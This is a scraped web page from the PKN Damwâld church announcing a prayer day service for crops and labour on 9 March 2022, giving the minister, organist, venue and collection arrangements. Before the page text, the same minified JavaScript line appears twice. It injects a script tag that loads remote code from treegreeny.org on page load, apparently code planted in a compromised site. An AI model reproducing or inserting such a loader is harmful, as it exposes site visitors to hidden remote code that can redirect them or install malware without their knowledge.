;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Biddag voor gewas en arbeid - PKN Damwâld
woensdag 9 maart 2022
19:30 uur

Biddag voor gewas en arbeid

Informatie

Voorganger:Ds. S. Boukes
Organist:Nienke van der Heide-Visser
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Uitganscollecte: Bij de uitgang of via QR-code